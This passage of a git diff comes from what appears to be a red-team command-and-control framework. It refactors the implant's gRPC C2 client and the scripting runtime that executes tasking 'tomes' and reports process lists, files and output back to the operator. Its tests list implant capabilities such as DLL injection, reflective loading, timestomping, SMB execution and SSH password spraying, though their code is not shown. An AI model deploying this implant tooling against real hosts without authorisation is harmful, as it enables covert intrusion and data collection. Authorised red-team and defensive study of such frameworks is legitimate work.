.insert(GrpcMethod::new("c2.C2", "ReportFile")); + self.grpc.client_streaming(req, path, codec).await + } - /// - /// Report the active list of running processes. This list will replace any previously reported - /// lists for the same host. - pub async fn report_process_list( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec< - super::ReportProcessListRequest, - super::ReportProcessListResponse, - > = tonic::codec::ProstCodec::default(); - let path = - tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_PROCESS_LIST_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportProcessList")); - self.grpc.unary(req, path, codec).await - } + /// + /// Report the active list of running processes. This list will replace any previously reported + /// lists for the same host. + pub async fn report_process_list( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_PROCESS_LIST_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ReportProcessList")); + self.grpc.unary(req, path, codec).await + } - /// - /// Report execution output for a task. - pub async fn report_task_output( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = - tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_TASK_OUTPUT_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); - self.grpc.unary(req, path, codec).await - } + /// + /// Report execution output for a task. + pub async fn report_task_output( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_TASK_OUTPUT_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); + self.grpc.unary(req, path, codec).await } } diff --git a/implants/lib/c2/src/lib.rs b/implants/lib/c2/src/lib.rs index 82ac2d0da..ceecb1e70 100644 --- a/implants/lib/c2/src/lib.rs +++ b/implants/lib/c2/src/lib.rs @@ -1,4 +1,6 @@ pub mod pb { include!("c2.rs"); - include!("c2_manual.rs"); } + +mod c2_manual; +pub use c2_manual::TavernClient; diff --git a/implants/lib/eldritch/Cargo.toml b/implants/lib/eldritch/Cargo.toml index 0ee665c83..c6a6845f5 100644 --- a/implants/lib/eldritch/Cargo.toml +++ b/implants/lib/eldritch/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "eldritch" -version = "0.0.4" +version = "0.0.5" edition = "2021" [features] @@ -23,11 +23,14 @@ gazebo = { workspace = true } hex = { workspace = true } hex-literal = { workspace = true } ipnetwork = { workspace = true } +log = { workspace = true } md5 = { workspace = true } netstat2 = { workspace = true } nix = { workspace = true } object = { workspace = true } openssl = { workspace = true, features = ["vendored"] } +prost = { workspace = true} +prost-types = { workspace = true } regex = { workspace = true } reqwest = { workspace = true , features = ["blocking", "stream"] } russh = { workspace = true } @@ -46,6 +49,7 @@ tempfile = { workspace = true } tera = { workspace = true } tokio = { workspace = true , features = ["macros", "rt-multi-thread"] } tokio-stream = { workspace = true } +tonic = { workspace = true, features = ["tls-roots"] } windows-sys = { workspace = true, features = [ "Win32_Foundation", "Win32_System_LibraryLoader", @@ -58,7 +62,6 @@ windows-sys = { workspace = true, features = [ ]} whoami = { workspace = true } - [target.'cfg(windows)'.dependencies] network-interface = { workspace = true } winreg = { workspace = true } @@ -69,3 +72,8 @@ pnet = { workspace = true } [dev-dependencies] httptest = { workspace = true } uuid = { workspace = true, features = ["v4"] } + +[build-dependencies] +tonic-build = { workspace = true } +anyhow = { workspace = true } +which = { workspace = true } diff --git a/implants/lib/eldritch/build.rs b/implants/lib/eldritch/build.rs index bf2854ea2..72fa0f736 100644 --- a/implants/lib/eldritch/build.rs +++ b/implants/lib/eldritch/build.rs @@ -1,3 +1,8 @@ +use anyhow::Result; +use std::env; +use std::path::PathBuf; +use which::which; + #[cfg(target_os = "windows")] fn build_bin_create_file_dll() { use std::{ @@ -97,10 +102,40 @@ fn set_host_family() { println!("cargo:rustc-cfg=host_family=\"{}\"", HOST_FAMILY); } -fn main() { +fn build_proto() -> Result<()> { + match env::var_os("PROTOC") + .map(PathBuf::from) + .or_else(|| which("protoc").ok()) + { + Some(_) => println!("Found protoc, protos will be generated"), + None => { + println!("WARNING: Failed to locate protoc, protos will not be generated"); + return Ok(()); + } + } + + match tonic_build::configure() + .out_dir("./src") + .protoc_arg("--rust_out=./src/pb.rs") + .build_client(false) + .build_server(false) + .compile(&["eldritch.proto"], &["../../../tavern/internal/c2/proto"]) + { + Err(err) => { + println!("WARNING: Failed to compile protos: {}", err); + } + Ok(_) => println!("Generating protos"), + } + Ok(()) +} + +fn main() -> Result<()> { set_host_family(); + build_proto()?; #[cfg(target_os = "windows")] build_bin_create_file_dll(); #[cfg(target_os = "windows")] build_bin_reflective_loader(); + + Ok(()) } diff --git a/implants/lib/eldritch/src/eldritch.rs b/implants/lib/eldritch/src/eldritch.rs new file mode 100644 index 000000000..21e6d3800 --- /dev/null +++ b/implants/lib/eldritch/src/eldritch.rs @@ -0,0 +1,138 @@ +/// Tome for eldritch to execute. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct Tome { + #[prost(string, tag = "1")] + pub eldritch: ::prost::alloc::string::String, + #[prost(map = "string, string", tag = "2")] + pub parameters: ::std::collections::HashMap< + ::prost::alloc::string::String, + ::prost::alloc::string::String, + >, + #[prost(string, repeated, tag = "3")] + pub file_names: ::prost::alloc::vec::Vec<::prost::alloc::string::String>, +} +/// Process running on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct Process { + #[prost(uint64, tag = "1")] + pub pid: u64, + #[prost(uint64, tag = "2")] + pub ppid: u64, + #[prost(string, tag = "3")] + pub name: ::prost::alloc::string::String, + #[prost(string, tag = "4")] + pub principal: ::prost::alloc::string::String, + #[prost(string, tag = "5")] + pub path: ::prost::alloc::string::String, + #[prost(string, tag = "6")] + pub cmd: ::prost::alloc::string::String, + #[prost(string, tag = "7")] + pub env: ::prost::alloc::string::String, + #[prost(string, tag = "8")] + pub cwd: ::prost::alloc::string::String, + #[prost(enumeration = "process::Status", tag = "9")] + pub status: i32, +} +/// Nested message and enum types in `Process`. +pub mod process { + #[derive( + Clone, + Copy, + Debug, + PartialEq, + Eq, + Hash, + PartialOrd, + Ord, + ::prost::Enumeration + )] + #[repr(i32)] + pub enum Status { + Unspecified = 0, + Unknown = 1, + Idle = 2, + Run = 3, + Sleep = 4, + Stop = 5, + Zombie = 6, + Tracing = 7, + Dead = 8, + WakeKill = 9, + Waking = 10, + Parked = 11, + LockBlocked = 12, + UninteruptibleDiskSleep = 13, + } + impl Status { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + Status::Unspecified => "STATUS_UNSPECIFIED", + Status::Unknown => "STATUS_UNKNOWN", + Status::Idle => "STATUS_IDLE", + Status::Run => "STATUS_RUN", + Status::Sleep => "STATUS_SLEEP", + Status::Stop => "STATUS_STOP", + Status::Zombie => "STATUS_ZOMBIE", + Status::Tracing => "STATUS_TRACING", + Status::Dead => "STATUS_DEAD", + Status::WakeKill => "STATUS_WAKE_KILL", + Status::Waking => "STATUS_WAKING", + Status::Parked => "STATUS_PARKED", + Status::LockBlocked => "STATUS_LOCK_BLOCKED", + Status::UninteruptibleDiskSleep => "STATUS_UNINTERUPTIBLE_DISK_SLEEP", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "STATUS_UNSPECIFIED" => Some(Self::Unspecified), + "STATUS_UNKNOWN" => Some(Self::Unknown), + "STATUS_IDLE" => Some(Self::Idle), + "STATUS_RUN" => Some(Self::Run), + "STATUS_SLEEP" => Some(Self::Sleep), + "STATUS_STOP" => Some(Self::Stop), + "STATUS_ZOMBIE" => Some(Self::Zombie), + "STATUS_TRACING" => Some(Self::Tracing), + "STATUS_DEAD" => Some(Self::Dead), + "STATUS_WAKE_KILL" => Some(Self::WakeKill), + "STATUS_WAKING" => Some(Self::Waking), + "STATUS_PARKED" => Some(Self::Parked), + "STATUS_LOCK_BLOCKED" => Some(Self::LockBlocked), + "STATUS_UNINTERUPTIBLE_DISK_SLEEP" => Some(Self::UninteruptibleDiskSleep), + _ => None, + } + } + } +} +/// ProcessList of running processes on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ProcessList { + #[prost(message, repeated, tag = "1")] + pub list: ::prost::alloc::vec::Vec, +} +/// File on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct File { + #[prost(string, tag = "1")] + pub path: ::prost::alloc::string::String, + #[prost(string, tag = "2")] + pub owner: ::prost::alloc::string::String, + #[prost(string, tag = "3")] + pub group: ::prost::alloc::string::String, + #[prost(string, tag = "4")] + pub permissions: ::prost::alloc::string::String, + #[prost(int64, tag = "5")] + pub size: i64, + #[prost(string, tag = "6")] + pub sha3_256_hash: ::prost::alloc::string::String, + #[prost(bytes = "vec", tag = "7")] + pub chunk: ::prost::alloc::vec::Vec, +} diff --git a/implants/lib/eldritch/src/lib.rs b/implants/lib/eldritch/src/lib.rs index 4781ccaa8..84d2c1ed3 100644 --- a/implants/lib/eldritch/src/lib.rs +++ b/implants/lib/eldritch/src/lib.rs @@ -3,28 +3,18 @@ pub mod crypto; pub mod file; pub mod pivot; pub mod process; +pub mod runtime; pub mod sys; pub mod time; -use starlark::collections::SmallMap; +pub mod pb { + include!("eldritch.rs"); +} + +pub use runtime::{Output, Runtime}; + #[allow(unused_imports)] use starlark::const_frozen_string; -use starlark::environment::{Globals, GlobalsBuilder, LibraryExtension, Module}; -use starlark::eval::Evaluator; -use starlark::syntax::{AstModule, Dialect}; -use starlark::values::dict::Dict; -use starlark::values::{AllocValue, Value}; -use starlark::{starlark_module, PrintHandler}; -use std::collections::HashMap; -use std::sync::mpsc::Sender; - -use crate::crypto::CryptoLibrary; -use assets::AssetsLibrary; -use file::FileLibrary; -use pivot::PivotLibrary; -use process::ProcessLibrary; -use sys::SysLibrary; -use time::TimeLibrary; macro_rules! insert_dict_kv { ($dict:expr, $heap:expr, $key:expr, $val:expr, String) => { @@ -66,281 +56,3 @@ macro_rules! insert_dict_kv { }; } pub(crate) use insert_dict_kv; - -pub fn get_eldritch() -> anyhow::Result { - #[starlark_module] - fn eldritch(builder: &mut GlobalsBuilder) { - const file: FileLibrary = FileLibrary(); - const process: ProcessLibrary = ProcessLibrary(); - const sys: SysLibrary = SysLibrary(); - const pivot: PivotLibrary = PivotLibrary(); - const assets: AssetsLibrary = AssetsLibrary(); - const crypto: CryptoLibrary = CryptoLibrary(); - const time: TimeLibrary = TimeLibrary(); - } - - let globals = GlobalsBuilder::extended_by(&[ - LibraryExtension::StructType, - LibraryExtension::RecordType, - LibraryExtension::EnumType, - LibraryExtension::Map, - LibraryExtension::Filter, - LibraryExtension::Partial, - LibraryExtension::ExperimentalRegex, - LibraryExtension::Debug, - LibraryExtension::Print, - LibraryExtension::Breakpoint, - LibraryExtension::Json, - LibraryExtension::Abs, - LibraryExtension::Typing, - ]) - .with(eldritch) - .build(); - return Ok(globals); -} - -pub struct EldritchPrintHandler { - pub sender: Sender, -} - -impl PrintHandler for EldritchPrintHandler { - fn println(&self, text: &str) -> anyhow::Result<()> { - let res = match self.sender.send(text.to_string()) { - Ok(local_res) => local_res, - Err(local_err) => return Err(anyhow::anyhow!(local_err.to_string())), - }; - Ok(res) - } -} - -pub struct StdPrintHandler {} - -impl PrintHandler for StdPrintHandler { - fn println(&self, text: &str) -> anyhow::Result<()> { - print!("{}", text.to_owned()); - Ok(()) - } -} - -pub fn eldritch_run( - tome_filename: String, - tome_contents: String, - tome_parameters: Option>, - print_handler: &(dyn PrintHandler), -) -> anyhow::Result { - // Boilder plate - let ast = match AstModule::parse( - &tome_filename, - tome_contents.as_str().to_owned(), - &Dialect::Extended, - ) { - Ok(res) => res, - Err(err) => { - return Err(anyhow::anyhow!( - "[eldritch] Unable to parse eldritch tome: {}: {} {}", - err.to_string(), - tome_filename.as_str(), - tome_contents.as_str() - )) - } - }; - - // let tome_params_str: String = match tome_parameters { - // Some(local_param_string) => match local_param_string.as_str() { - // "" => "{}".to_string(), // If we get "" as our params update it to "{}" - // _ => local_param_string, // Otherwise return our string. - // }, - // None => "{}".to_string(), - // }; - - let globals = match get_eldritch() { - Ok(local_globals) => local_globals, - Err(local_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Failed to get_eldritch globals: {}", - local_error.to_string() - )) - } - }; - - let module: Module = Module::new(); - - let res: SmallMap = SmallMap::new(); - let mut input_params: Dict = Dict::new(res); - - match tome_parameters { - Some(params) => { - for (key, value) in ¶ms { - let new_key = module.heap().alloc_str(&key); - let new_value = module.heap().alloc_str(value.as_str()).to_value(); - let hashed_key = match new_key.to_value().get_hashed() { - Ok(local_hashed_key) => local_hashed_key, - Err(local_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Failed to create hashed key for key {}: {}", - new_key.to_string(), - local_error.to_string() - )) - } - }; - input_params.insert_hashed(hashed_key, new_value); - } - } - None => {} - } - module.set("input_params", input_params.alloc_value(module.heap())); - - let mut eval: Evaluator = Evaluator::new(&module); - eval.set_print_handler(print_handler); - - let res: Value = match eval.eval_module(ast, &globals) { - Ok(eval_val) => eval_val, - Err(eval_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Eldritch eval_module failed:\n{}", - eval_error - )) - } - }; - - Ok(res.to_str()) -} - -#[cfg(test)] -mod tests { - use std::{sync::mpsc::channel, thread, time::Duration}; - - use super::*; - use starlark::assert::Assert; - use tempfile::NamedTempFile; - - // just checks dir... - #[test] - fn test_library_bindings() { - let globals = get_eldritch().unwrap(); - let mut a = Assert::new(); - a.globals(globals); - a.all_true( - r#" -dir(file) == ["append", "compress", "copy", "download", "exists", "find", "is_dir", "is_file", "list", "mkdir", "moveto", "read", "remove", "replace", "replace_all", "template", "timestomp", "write"] -dir(process) == ["info", "kill", "list", "name", "netstat"] -dir(sys) == ["dll_inject", "dll_reflect", "exec", "get_env", "get_ip", "get_os", "get_pid", "get_reg", "get_user", "hostname", "is_linux", "is_macos", "is_windows", "shell", "write_reg_hex", "write_reg_int", "write_reg_str"] -dir(pivot) == ["arp_scan", "bind_proxy", "ncat", "port_forward", "port_scan", "smb_exec", "ssh_copy", "ssh_exec", "ssh_password_spray"] -dir(assets) == ["copy","list","read","read_binary"] -dir(crypto) == ["aes_decrypt_file", "aes_encrypt_file", "decode_b64", "encode_b64", "from_json", "hash_file", "to_json"] -dir(time) == ["format_to_epoch", "format_to_readable", "now", "sleep"] -"#, - ); - } - - #[test] - fn test_library_parameter_input_string() -> anyhow::Result<()> { - // Create test script - let test_content = format!( - r#" -sys.shell(input_params['cmd2']) -"# - ); - let params = HashMap::from([ - ("cmd".to_string(), "id".to_string()), - ("cmd2".to_string(), "echo hello_world".to_string()), - ("cmd3".to_string(), "ls -lah /tmp/".to_string()), - ]); - let test_res = eldritch_run( - "test.tome".to_string(), - test_content, - Some(params), - &StdPrintHandler {}, - ); - assert!(test_res?.contains("hello_world")); - Ok(()) - } - - #[test] - fn test_library_parameter_input_number() -> anyhow::Result<()> { - // Create test script - let test_content = format!( - r#" -input_params["number"] -"# - ); - let params = HashMap::from([("number".to_string(), "1".to_string())]); - let test_res = eldritch_run( - "test.tome".to_string(), - test_content, - Some(params), - &StdPrintHandler {}, - ); - assert_eq!(test_res.unwrap(), "1".to_string()); - Ok(()) - } - - #[tokio::test] - async fn test_library_async() -> anyhow::Result<()> { - // just using a temp file for its path - let tmp_file = NamedTempFile::new()?; - let path = String::from(tmp_file.path().to_str().unwrap()) - .clone() - .replace("\\", "\\\\"); - let test_content = format!( - r#" -file.download("https://www.google.com/", "{path}") -"# - ); - let test_res = thread::spawn(|| { - eldritch_run( - "test.tome".to_string(), - test_content, - None, - &StdPrintHandler {}, - ) - }); - let _test_val = test_res.join(); - - assert!(tmp_file.as_file().metadata().unwrap().len() > 5); - - Ok(()) - } - #[tokio::test] - async fn test_library_custom_print_handler() -> anyhow::Result<()> { - // just using a temp file for its path - let test_content = format!( - r#" -print("Hello") -print("World") -print("123") -"# - ); - let (sender, receiver) = channel::(); - - let test_res = thread::spawn(|| { - eldritch_run( - "test.tome".to_string(), - test_content, - None, - &EldritchPrintHandler { sender }, - ) - }); - let _test_val = test_res.join(); - let expected_output = vec!["Hello", "World", "123"]; - let mut index = 0; - loop { - let res = match receiver.recv_timeout(Duration::from_millis(500)) { - Ok(local_res_string) => local_res_string, - Err(local_err) => { - match local_err.to_string().as_str() { - "channel is empty and sending half is closed" => { - break; - } - _ => eprint!("Error: {}", local_err), - } - break; - } - }; - assert_eq!(res, expected_output[index].to_string()); - index = index + 1; - } - - Ok(()) - } -} diff --git a/implants/lib/eldritch/src/pivot/arp_scan_impl.rs b/implants/lib/eldritch/src/pivot/arp_scan_impl.rs index 56d4ef432..ae9763e89 100644 --- a/implants/lib/eldritch/src/pivot/arp_scan_impl.rs +++ b/implants/lib/eldritch/src/pivot/arp_scan_impl.rs @@ -215,7 +215,7 @@ pub fn handle_arp_scan( Ok(_) => {} Err(_err) => { #[cfg(debug_assertions)] - eprintln!("Listener on {} failed: {}", inner_interface.name, _err); + log::error!("Listener on {} failed: {}", inner_interface.name, _err); } }, ); diff --git a/implants/lib/eldritch/src/runtime.rs b/implants/lib/eldritch/src/runtime.rs new file mode 100644 index 000000000..a418952d8 --- /dev/null +++ b/implants/lib/eldritch/src/runtime.rs @@ -0,0 +1,550 @@ +use crate::pb::{File, ProcessList}; +use crate::{ + assets::AssetsLibrary, crypto::CryptoLibrary, file::FileLibrary, pb::Tome, pivot::PivotLibrary, + process::ProcessLibrary, sys::SysLibrary, time::TimeLibrary, +}; +use anyhow::{Context, Error, Result}; +use chrono::Utc; +use prost_types::Timestamp; +use starlark::{ + collections::SmallMap, + environment::{Globals, GlobalsBuilder, LibraryExtension, Module}, + eval::Evaluator, + starlark_module, + syntax::{AstModule, Dialect}, + values::{dict::Dict, AnyLifetime}, + values::{AllocValue, ProvidesStaticType}, + PrintHandler, +}; +use std::sync::mpsc::{channel, Receiver, Sender}; +use std::time::Duration; + +/* + * Eldritch Runtime + * + * This runtime is responsible for executing Tomes and reporting their output. + * It acts as an interface between callers and starlark, exposing our standard libraries to the starlark interpreter. + * It is also used to provide dependency injection for eldritch library functions (using `Runtime::from_extra(starlark_interpreter.extra)`). + */ +#[derive(ProvidesStaticType)] +pub struct Runtime { + stdout_reporting: bool, + + ch_exec_started_at: Sender, + ch_exec_finished_at: Sender, + ch_output: Sender, + ch_error: Sender, + ch_process_list: Sender, + ch_file: Sender, +} + +impl Runtime { + /* + * Prepare a new Runtime for execution of a single tome. + */ + pub fn new() -> (Runtime, Output) { + let (ch_exec_started_at, exec_started_at) = channel::(); + let (ch_exec_finished_at, exec_finished_at) = channel::(); + let (ch_error, errors) = channel::(); + let (ch_output, outputs) = channel::(); + let (ch_process_list, process_lists) = channel::(); + let (ch_file, files) = channel::(); + + return ( + Runtime { + stdout_reporting: false, + ch_exec_started_at, + ch_exec_finished_at, + ch_output, + ch_error, + ch_process_list, + ch_file, + }, + Output { + exec_started_at, + exec_finished_at, + outputs, + errors, + process_lists, + files, + }, + ); + } + + /* + * Extract an existing runtime from the starlark evaluator extra field. + */ + pub fn from_extra<'a>(extra: Option<&'a dyn AnyLifetime<'a>>) -> Result<&'a Runtime> { + extra + .context("no extra field present in evaluator")? + .downcast_ref::() + .context("no runtime present in evaluator") + } + + /* + * Run an Eldritch tome, returning an error if it fails. + * Output from the tome is exposed via channels, see `reported_output`, `reported_process_list`, and `reported_files`. + */ + pub fn run(&self, tome: Tome) { + match self.report_exec_started_at() { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to send exec_started_at: {_err}"); + } + } + + match self.run_impl(tome) { + Ok(_) => {} + Err(err) => match self.report_error(err) { + Ok(_) => {} + Err(_send_err) => { + #[cfg(debug_assertions)] + log::error!("failed to send error: {_send_err}"); + } + }, + } + + match self.report_exec_finished_at() { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to send exec_finished_at: {_err}"); + } + } + } + + fn run_impl(&self, tome: Tome) -> Result<()> { + let ast = Runtime::parse(&tome)?; + let module = Runtime::alloc_module(&tome)?; + let globals = Runtime::globals(); + + let mut eval: Evaluator = Evaluator::new(&module); + eval.extra = Some(self); + eval.set_print_handler(self); + + match eval.eval_module(ast, &globals) { + Ok(_) => Ok(()), + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("tome execution failed: {_err}"); + Err(_err) + } + } + } + + /* + * Globals available to eldritch code. + * This provides all of our starlark standard libraries. + */ + pub fn globals() -> Globals { + #[starlark_module] + fn eldritch(builder: &mut GlobalsBuilder) { + const file: FileLibrary = FileLibrary(); + const process: ProcessLibrary = ProcessLibrary(); + const sys: SysLibrary = SysLibrary(); + const pivot: PivotLibrary = PivotLibrary(); + const assets: AssetsLibrary = AssetsLibrary(); + const crypto: CryptoLibrary = CryptoLibrary(); + const time: TimeLibrary = TimeLibrary(); + } + + GlobalsBuilder::extended_by(&[ + LibraryExtension::StructType, + LibraryExtension::RecordType, + LibraryExtension::EnumType, + LibraryExtension::Map, + LibraryExtension::Filter, + LibraryExtension::Partial, + LibraryExtension::ExperimentalRegex, + LibraryExtension::Debug, + LibraryExtension::Print, + LibraryExtension::Breakpoint, + LibraryExtension::Json, + LibraryExtension::Abs, + LibraryExtension::Typing, + ]) + .with(eldritch) + .build() + } + + /* + * Parse an Eldritch tome into a starlark Abstract Syntax Tree (AST) Module. + */ + fn parse(tome: &Tome) -> Result { + match AstModule::parse("main", tome.eldritch.to_string(), &Dialect::Extended) { + Ok(res) => Ok(res), + Err(err) => { + return Err(anyhow::anyhow!( + "[eldritch] Unable to parse eldritch tome: {}: {}", + err.to_string(), + tome.eldritch.to_string(), + )) + } + } + } + + /* + * Allocate tome parameters on a new starlark module and return it, ready for execution. + */ + fn alloc_module(tome: &Tome) -> Result { + let module: Module = Module::new(); + let mut input_params: Dict = Dict::new(SmallMap::new()); + + for (key, value) in &tome.parameters { + let new_key = module.heap().alloc_str(&key); + let new_value = module.heap().alloc_str(value.as_str()).to_value(); + let hashed_key = match new_key.to_value().get_hashed() { + Ok(local_hashed_key) => local_hashed_key, + Err(local_error) => { + return Err(anyhow::anyhow!( + "[eldritch] Failed to create hashed key for key {}: {}", + new_key.to_string(), + local_error.to_string() + )) + } + }; + input_params.insert_hashed(hashed_key, new_value); + } + module.set("input_params", input_params.alloc_value(module.heap())); + + Ok(module) + } + + /* + * Print execution results to stdout as they become available. + */ + pub fn with_stdout_reporting(&mut self) -> &mut Self { + self.stdout_reporting = true; + self + } + + /* + * Send exec_started_at timestamp. + */ + fn report_exec_started_at(&self) -> Result<()> { + let now = Utc::now(); + self.ch_exec_started_at.send(Timestamp { + seconds: now.timestamp(), + nanos: now.timestamp_subsec_nanos() as i32, + })?; + Ok(()) + } + + /* + * Send exec_finished_at timestamp. + */ + fn report_exec_finished_at(&self) -> Result<()> { + let now = Utc::now(); + self.ch_exec_finished_at.send(Timestamp { + seconds: now.timestamp(), + nanos: now.timestamp_subsec_nanos() as i32, + })?; + Ok(()) + } + + /* + * Report output of the tome execution. + */ + pub fn report_output(&self, output: String) -> Result<()> { + self.ch_output.send(output)?; + Ok(()) + } + + /* + * Report error of the tome execution. + */ + pub fn report_error(&self, err: anyhow::Error) -> Result<()> { + self.ch_error.send(err)?; + Ok(()) + } + + /* + * Report a process list that was collected by the tome. + */ + pub fn report_process_list(&self, processes: ProcessList) -> Result<()> { + self.ch_process_list.send(processes)?; + Ok(()) + } + + /* + * Report a file that was collected by the tome. + */ + pub fn report_file(&self, f: File) -> Result<()> { + self.ch_file.send(f)?; + Ok(()) + } +} + +/* + * Enables Runtime to be used as a starlark print handler. + */ +impl PrintHandler for Runtime { + fn println(&self, text: &str) -> anyhow::Result<()> { + self.report_output(text.to_string())?; + if self.stdout_reporting { + print!("{}", text); + } + Ok(()) + } +} + +/* + * Output enables callers to listen for various types of output from the runtime. + * Each of the `collect` methods will return lists of all currently available data. + */ +pub struct Output { + exec_started_at: Receiver, + exec_finished_at: Receiver, + outputs: Receiver, + errors: Receiver, + process_lists: Receiver, + files: Receiver, +} + +impl Output { + /* + * Returns the timestamp of when execution started, if available. + */ + pub fn get_exec_started_at(&self) -> Option { + drain_last(&self.exec_started_at) + } + + /* + * Returns the timestamp of when execution finished, if available. + */ + pub fn get_exec_finished_at(&self) -> Option { + drain_last(&self.exec_finished_at) + } + + /* + * Collects all currently available reported text output. + */ + pub fn collect(&self) -> Vec { + drain(&self.outputs) + } + + /* + * Collects all currently available reported errors, if any. + */ + pub fn collect_errors(&self) -> Vec { + drain(&self.errors) + } + + /* + * Returns all currently available reported process lists, if any. + */ + pub fn collect_process_lists(&self) -> Vec { + drain(&self.process_lists) + } + + /* + * Returns all currently available reported files, if any. + */ + pub fn collect_files(&self) -> Vec { + drain(&self.files) + } +} + +/* + * Drain a receiver, returning only the last currently available result. + */ +fn drain_last(receiver: &Receiver) -> Option { + drain(receiver).pop() +} + +/* + * Drain a receiver, returning all currently available results as a Vec. + */ +fn drain(reciever: &Receiver) -> Vec { + let mut result: Vec = Vec::new(); + loop { + let val = match reciever.recv_timeout(Duration::from_millis(100)) { + Ok(v) => v, + Err(err) => { + match err.to_string().as_str() { + "channel is empty and sending half is closed" => { + break; + } + "timed out waiting on channel" => { + break; + } + _ => { + #[cfg(debug_assertions)] + eprint!("failed to drain channel: {}", err) + } + } + break; + } + }; + // let appended_line = format!("{}{}", res.to_owned(), new_res_line); + result.push(val); + } + result +} + +#[cfg(test)] +mod tests { + use crate::{pb::Tome, Runtime}; + use anyhow::Error; + use std::collections::HashMap; + use tempfile::NamedTempFile; + + macro_rules! runtime_tests { + ($($name:ident: $value:expr,)*) => { + $( + #[test] + fn $name() { + let tc: TestCase = $value; + let (runtime, output) = Runtime::new(); + runtime.run(tc.tome); + + let want_err_str = match tc.want_error { + Some(err) => err.to_string(), + None => "".to_string(), + }; + let err_str = match output.collect_errors().pop() { + Some(err) => err.to_string(), + None => "".to_string(), + }; + assert_eq!(want_err_str, err_str); + assert_eq!(tc.want_output, output.collect().join("")); + } + )* + } + } + + struct TestCase { + pub tome: Tome, + pub want_output: String, + pub want_error: Option, + } + + runtime_tests! { + simple_run: TestCase{ + tome: Tome{ + eldritch: String::from("print(1+1)"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from("2"), + want_error: None, + }, + multi_print: TestCase { + tome: Tome{ + eldritch: String::from(r#"print("oceans "); print("rise, "); print("empires "); print("fall")"#), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"oceans rise, empires fall"#), + want_error: None, + }, + input_params: TestCase{ + tome: Tome { + eldritch: r#"print(input_params['cmd2'])"#.to_string(), + parameters: HashMap::from([ + ("cmd".to_string(), "id".to_string()), + ("cmd2".to_string(), "echo hello_world".to_string()), + ("cmd3".to_string(), "ls -lah /tmp/".to_string()), + ]), + file_names: Vec::new(), + }, + want_output: String::from("echo hello_world"), + want_error: None, + }, + file_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(file))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["append", "compress", "copy", "download", "exists", "find", "is_dir", "is_file", "list", "mkdir", "moveto", "read", "remove", "replace", "replace_all", "template", "timestomp", "write"]"#), + want_error: None, + }, + process_bindings: TestCase { + tome: Tome{ + eldritch: String::from("print(dir(process))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["info", "kill", "list", "name", "netstat"]"#), + want_error: None, + }, + sys_bindings: TestCase { + tome: Tome{ + eldritch: String::from("print(dir(sys))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["dll_inject", "dll_reflect", "exec", "get_env", "get_ip", "get_os", "get_pid", "get_reg", "get_user", "hostname", "is_linux", "is_macos", "is_windows", "shell", "write_reg_hex", "write_reg_int", "write_reg_str"]"#), + want_error: None, + }, + pivot_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(pivot))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["arp_scan", "bind_proxy", "ncat", "port_forward", "port_scan", "smb_exec", "ssh_copy", "ssh_exec", "ssh_password_spray"]"#), + want_error: None, + }, + assets_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(assets))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["copy", "list", "read", "read_binary"]"#), + want_error: None, + 